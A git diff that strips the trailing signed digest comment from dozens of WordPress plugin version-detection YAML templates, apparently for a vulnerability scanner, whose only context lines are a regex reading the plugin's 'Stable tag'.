b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c737be661a0fae3a3f6cf006b006882e7dded4fb38c86cca848e68bee221190022071502112e2085d8cef5b46691eb1c35841f208d92f3a66b7212ca9500117c7e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index a8f3f61d2c..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ccded132e64475fd0d897076fe33a20bc9eaf4a7b5b2625cc84ba97015ccf3340221009d665e0fda9fff8e9d1549ded0cb6065a03e962187dadf81d6d27d0666fc438d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 4b6ef32fe4..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206341c909bb55e82d0eb80a22fd772b5ad01443f3c78afe6733a513e48bf4f5f102204fd740863b038dd42e399e674c78486c06a221f8b48b352821beaee4eb929325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e160c8c6f8..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1f9194438a57ef38a09f9b096f406c0ac76863564680f9da531be623df969360220380a8d7d1125a9b14fa9d2c3b996beee7fa3520bfccee2d284536ebc379995ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index ff813aad3b..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220168e3f618beac1a287ef9ad39d2ca54a2147ee9de5d492d85b81a24b1b230dba0221008f7549550a13975c7049b2564cb6c5cf75ac202b748d27b919da8f92956da1d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 30f60d741b..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009a0a6bce819015435c7a5d9aa3ffbfbfa6ffc5de3f9ace06d7d63908c61896b2022100f82e368835347b70338b7066bd77393e411142cb518eb4d78eea6f966acf9291:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index c0d0dc3823..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ecf47ae98fd2b24fdf29772a60b9cad30a5f430428807600c1e02dc1133f2bd0220640c7277b1d28b8f4fb1bb77a3ef4896ecac27919637c3ab8c200f29ec07e6fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 4704727f6a..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e83911ec48374cbd4cd8ff30baf703bdcf73a22e34a5c7cfe522fd7354ae616022100f56347ff9c84e5d3c0ff5fdb13aef15c3b361e7f9d0a81090f1b5ae2bd487d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 326e986f9c..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b59f9aa912618cb9781937b6ae0b4080c355884c8ccc379aa0d0a1582d8d41a8022100b9421c497ad5f8f7ca5ce9fc3f612a0bbae4efd008d6800b01f9dca4072f9c23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 699c1d7e72..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207121c37459760def8c49410c299a238db784e369d9bb7b1fdb60e5c64907d87f0220768c62c2a33a329690df4d1580da1e2c216518d1f17c25a79b66c679e9af5903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 69c58d09ae..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a15a9d6f3cc67524c4263769de30c6c4694e5ca1cf2fa1b15021f71b1741161a022100ff6c28345eaae99a50529916c445e172f764e3f5571e0672c1b5a3bb78288130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index ddb240aa09..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059f4f853c2c20528a64e8c0c6e15a9919ee6a95a68518d6cb966939560a38666022100e20e2e5acceb14a973406505cf5f5428dd0ec5d6d18dd195ceb0beb421d05a88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index db2b1099f0..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d2deae583de7d55d7f1a88a0eefdaba554802528408228f60c4fbd41115a2d7d022100e41841fd2dd3edbe8953e5de435cc0070aedbad5b8ae585da2eefafd7e7d406c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8bfaa5b280..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b085549d9abb8cbfc4042550dbe8cffea3b1c69ce22f88a8d77f083d03e94ae02201d4f042b64fb9af1b9c8a047bd1adbf11f585a1266254b3901fac3f621d56893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 727451b7d8..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203383e298cc9c2a3c974d2282f0de0a45a68a352e200351b56e9bd0f3aee6429502210093ca998d3fe2766cfa42da6d3d8523e3aec1504f4fcb3171628ee7e14a2387c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 21fb18231f..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220104d82f69a57372bbcd1867f2760d54c8b0f832ace98d0e0f4ecdb20e446dfc0022052790f76f889553916454fb402166569b5c06e251a17cbafc16ee5bba32e572e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 70863b703d..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220042f9cc324f1b236aae497acb0093c785e22fdee30443019f570bc1c762ba9ee02207804a124519a0261253a8c9269a6960c6076d3090e546380fe6839dbbbe6d2a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 113e4b30ce..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4737a90496ccc1dfacbfad4cd63941526f73f329b161ab0bbe66a879cc57f1d022100f81af63fedbb770a4a8877f7c6ad2bee006a656e55bfa941c4ba341d75b64a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 898cd70b08..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f174610a7c8dfd08b03f253fbf664e18afca6e8e2aef63a0cc725bdb5f8ad1a02203687d5c574d34edca1ec139d644a30f6b032b4874ce22cae87883562c6c89af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9c9734ca2..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a977391007e31e34417991906af0e722dd5c3055c157e289f6ff7a9e056bf63a02204396a2ef9cd5bd3321e78efa7751adee6469ef461f2131f05f8bc057ccb15040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8688b5b4fe..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a281f669bc5401da541562492e1d213a2b539d8abb88fa752b98bf4947905cf702205ffc72d16c73a85cabc347ef588fb91239678f29a1110cdc8b1daa818ed0af1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index d9a875dec5..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085b3190febc21052f5b817f68c3f9d256968f40f9c455f547235d6a7e062c45b022100f6d775e9ede029f1e28c1603140959f93a0d48661d43050e725f73984638394b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index cd7bf8f53c..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aca131cbc3814415079827c191bec32374a6d5455593edcbdc0ee70ddefe5b250220765bec11b882a67a0c5de786f540d8cf95425953be8ce2fa6d69eae4aa95ff1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index a44017fe1f..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5256fef8bfe47582c9c44a66db7da639e723c173654d50299ac326ae3470e6e022042540df91729bb981e0a6c157370a9f4257540a88886972a775614737626eac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index dbb15ed000..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203736554d07833fd7fefbef2194a2cf582ded34203e7b1b7b959c8fdbeaad1809022100e8fe263fb147421433941966a263dcabc8a00c2b51095abf10dd4b2562317ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 95e568017c..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210088acb6063e2c9a3020816b1164569d77c9ad5c254d968b5f3b71d4ed46fb3b1b0220064747dec3b652ebef681016de711ca9b8755c80b522554838e9fb0373531125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index e35d78595a..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a91028b11ae9383db56ad21df17e2ec58c86c3cf0c2436aecdd09a2af63a0e7022100ec427b4a9cbb981f2e38c1d14f1d88a72c7d41e49f0b9c10651f1fad3f1cb299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 6b91e94952..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204c0c0766cbe7b82372c41eb6875ad3c5f5e2a464e08e8d73e08904e09751028c022100d491504222c303d0ccf6bea2d0ff881458de0336c8a238dbf19ecbbc1b94c789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 9b24d42c96..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2586dbe1e3760fdcc35998d1f4a7ab642493f6eaa95b03aa8f5bbecdddf0c5c02204d6b2def35f807d24eaa59cd4f35f9cb927872fdbbee4fa0360ed42ef6b0d75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5f2f45d863..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a7e991a0a92d3d9009a22ce86901c402771b9e52ba1a8e1a99b2f015fd83ac7022100b5ff099d9879adbe799b5d53c3ec0f0d7739af6bca82c646d88568101570b699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 24354e9e30..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022045fa856f34668f629b2ddd20035b1ee5993194b4cea83d8f6fa9b852444ea68b022100a02542492890a59d288ccd2bdf7931b743d83842734b1625672cdf64a87cb3e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 11cd377395..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012c58a8cd15585bdd24369415e0637c759a3fc81fc61bd4bf3fb7c11f652d56d02202dbbafb2afcc5412f1aa7dc8b0d3a4be3f900057d4a579065196649f7649ec85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 345ea936ef..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033e264d480b0a83d82f782d4373cdeab67c8c7f8c1a2be285c6e8205bcfb900502206b10156d2cbb5ee9662b53bffe1cc4d91d413f36048ff66b1c283728b2e0f662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 9a809f1d39..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220436f09bfa6baf0d000f077e79399147c20176acc40913765c42d6daca99222bb0220568dc937c44a5548bc8358f91ea662b0fa40f78cebf1e29cd8d4e5113e79f8f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 2ef4f60e69..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220584574f247ce3079b97e2c8184e991da88bca937c8163b7aa788021c8149148302201ac3d0ce615820c90561a0c526a346e235e00947b505447c63b3794bd8e60620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index c4eb2d9929..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dbcb7bbd215b74cd17e9f86c3f1a0645f7efaf972550199266776184a398612a02210087dcb2d08e7037d41b422c5ea780628a08e2908ca91bad54aa4096ec9e826bfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index e52d8d0a43..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008377ed6399aba037976ba2430936c25bbb77b40150787a26902b9f514d35e52e02204578eeff394b710940673e102ce8b3a3cdc700773d53f08346b7db6b9d3d74ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 6cb86b8fb3..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e474a70a1c048074e3f7437c49e8ef9aeb76d5de7a1adc7c9fb5ff81a665e640221009f2b574c47cb5b39864f31437139a61540a06dda63ce4e3c158ef9c649cf5490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index ed61ff3570..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090e6403bb3825ae9215a4a3fe21943c55adeb529c04fd0fbf75dceeed21cac8a022100d6bb1950c4b13d8f9a462bfcfe5c12203d60b129c8d9a836c172e369916e4929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 08aaee8d70..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200933dc202e0241ce1f23140b2e7411615fe76f6013d0f54d2d7746e6dff65c7d02205e4c008c46f52b1f896511b440c84c0b2b94945225772230f03d300802dbd7cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index b26ba69943..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d4aaf8b7d0b5c57d4a5cee015450c3fb96caf96a0265326600d1c557c3ce6a3e022100d184b02675e6be844feb4b689c2101a607b7e46bb0ccf712e41f9a5b9126fed3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d8de5891bc..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7a73923978a7063a2e544b08c4399d5e281d65adbe906f114bfc0cd3adbafca02200685be49f3a74b022d357f2b611f0aa35a33e027d1e561d6f9cad44ab74b7e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 80b4a4283f..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a442288ea9a01804f9efe5ae1ab3107463b9406a187e0e4dbcf449af00497c7022100ed6edbb64d48c84ed59329550cc0cf995be16c8c3884abad5bac7fd3fe06c0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index cbb2b6164a..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b27ef83c3501ebe2ab308acc32f3050456bd45b25c919f5221b32f845d2499502204098f9f2cd685dba7a2588550bd891cee5db745528f6679352bb1108bdac6759:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 24da23121e..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204419bf1063f851ad3abd396688d385276264f67c63ad23a82b477e8df26f2e4e0221008f234759bf8caeed9a8996d1967cb1cffd9f0ad01121a0986a1a74572ab4010b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 61597f9ae7..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d1f594b89a3c06670642076e14b78000918b2d0a6c7d6e7d9d3bbe64f85c4af02202e23f67c3694cf4c915c8a72bb7127cf0a2b97ea22af8958458beb0d90c03714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 9d328dff91..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa6fa34ef2879134613ad259af410ee56a733c5fd5d9b9dea8a213b919e7768502207e199952cb609922b009b12c90f5d8365f14acd5d54c2d9a1ca873b699f08711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index e5fb1f24da..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026f2622687dd90537db55699816c0eac8be0db93cf21ea0eb983392fc2b1dcaf02202b82394b4374fce90d61e02a3eabee044ce98109c35d000fc6e466603c11c465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 